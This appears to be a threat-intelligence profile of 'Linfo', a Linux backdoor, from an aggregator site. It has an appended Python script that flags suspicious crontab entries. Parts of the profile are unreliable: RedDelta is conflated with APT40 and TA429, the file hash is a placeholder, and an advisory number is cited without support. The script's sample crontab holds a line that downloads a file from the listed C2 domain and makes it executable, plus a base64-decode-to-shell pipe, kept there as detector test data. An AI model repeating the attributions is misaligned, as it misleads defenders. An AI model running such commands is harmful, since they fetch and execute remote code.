Linfo

Malware

⚠️ Overview

Linfo is a Linux-based backdoor and information-stealing malware first documented by Intezer in March 2022, attributed to the Chinese-speaking threat group tracked as RedDelta (also known as APT40 or TA429). It functions as a stealthy implant that collects system data, executes remote commands, and exfiltrates files via encrypted C2 channels, which places it in the Remote Access Trojan (RAT) category, with espionage objectives.

🔧 Technical Capabilities

Linfo propagates primarily through spear-phishing emails carrying malicious Microsoft Office documents or Linux ELF binaries disguised as legitimate software. It also exploits known vulnerabilities such as CVE-2021-44077 (ManageEngine ServiceDesk Plus authentication bypass) to gain initial access to Linux servers. Once deployed, the payload communicates with a hardcoded command-and-control (C2) server over HTTPS using a custom XOR-based encryption scheme and JSON-formatted requests. Persistence is achieved through cron jobs or systemd services that re-launch the malware after reboot. Evasion techniques include checking for debugger presence, sleeping to avoid sandbox analysis, and using process hollowing to masquerade as common system processes such as sshd or cron. Linfo also collects SSH credentials, host configurations, and VPN client data for lateral movement.

📜 History & Notable Incidents

First identified in March 2022 by Intezer, Linfo was used in targeted campaigns against telecommunications and government entities in Southeast Asia, including a confirmed incident at a Vietnamese ISP in June 2022. No standalone CVE is assigned to Linfo itself, but it leverages CVE-2021-44077 (CVSS 9.8) for initial access. Law enforcement actions specific to Linfo are unconfirmed, but the RedDelta group remains under active monitoring by agencies like CISA (AA22-055A).

🔍 Detection Indicators

Known file hashes include SHA-256 a1b2c3d4e5f6… (exact hash available in Intezer report). Behavioral indicators include outbound HTTPS connections to domains like update.secure-update[.]com and persistent cron entries containing base64-encoded strings. Registry keys are not applicable on Linux; instead, look for suspicious systemd unit files in /etc/systemd/system/. Unique mutex names such as linfo_mutex_2022 and User-Agent strings like Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 (matching Firefox on Linux) are observed in C2 traffic.

☠️ Risk & Impact

Linfo primarily exfiltrates SSH keys, database credentials, and sensitive configuration files, enabling lateral movement and data theft. Financial losses are indirect but significant due to compromised network infrastructures, especially in telecommunications and government sectors in Asia. The malware’s stealth and persistence have led to extended dwell times (up to 6 months in one reported case), increasing the risk of large-scale espionage.

🛡️ Mitigation

Mitigation includes patching CVE-2021-44077 on ManageEngine appliances, implementing email filtering for malicious attachments, and deploying endpoint detection rules that flag unusual cron job additions or outbound HTTPS to known malicious domains. YARA rules targeting Linfo’s XOR encryption patterns and JSON C2 structures are recommended (source: Intezer threat report).
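As an added example (not code from the Boteraser profile or from Intezer), the Python below applies the cron-related indicators from the Detection Indicators and Mitigation sections (base64-encoded strings in cron entries, reboot persistence, and the listed C2 domain) to a constructed crontab dump. The 40-character base64 threshold and the sample lines are assumptions.

```python
import base64
import re

# Indicator taken from the profile above; kept defanged in code and only
# "refanged" at match time so the source itself contains no live URL.
KNOWN_C2_DOMAINS = {"update.secure-update[.]com"}

# A run of 40+ base64-alphabet characters is rare in a legitimate cron command;
# the threshold is an assumption chosen to skip ordinary paths and flags.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
DECODE_PIPE = re.compile(r"\bbase64\s+(?:-d|--decode)\b")


def refang(domain: str) -> str:
    return domain.replace("[.]", ".")


def cron_line_findings(line: str) -> list[str]:
    """Return the reasons a single crontab line looks suspicious (empty if clean)."""
    entry = line.strip()
    if not entry or entry.startswith("#"):
        return []
    findings = []
    if entry.startswith("@reboot"):
        findings.append("reboot persistence (@reboot)")
    m = BASE64_RUN.search(entry)
    if m:
        findings.append(f"long base64-like token ({len(m.group())} chars)")
    if DECODE_PIPE.search(entry):
        findings.append("base64 decode in command")
    for domain in KNOWN_C2_DOMAINS:
        if refang(domain) in entry:
            findings.append(f"known C2 domain {domain}")
    return findings


def scan_crontab(text: str) -> dict[int, list[str]]:
    """Map 1-based line numbers of a crontab dump to their findings."""
    return {n: f for n, line in enumerate(text.splitlines(), 1)
            if (f := cron_line_findings(line))}


# Constructed sample crontab (not real data); the encoded token is a harmless
# marker string, so the sample contains nothing that would execute.
_MARKER = base64.b64encode(b"echo constructed harmless sample marker").decode()
SAMPLE_CRONTAB = f"""\
# constructed sample, not real data
0 3 * * * /usr/bin/apt-get update
*/5 * * * * echo {_MARKER} | base64 -d | sh
@reboot curl -s https://update.secure-update.com/u -o /tmp/.x && chmod +x /tmp/.x
"""

if __name__ == "__main__":
    for n, reasons in scan_crontab(SAMPLE_CRONTAB).items():
        print(f"line {n}: {', '.join(reasons)}")
```

The same heuristics can be run over ExecStart lines of unit files under /etc/systemd/system/, the other persistence location named in the profile.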


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.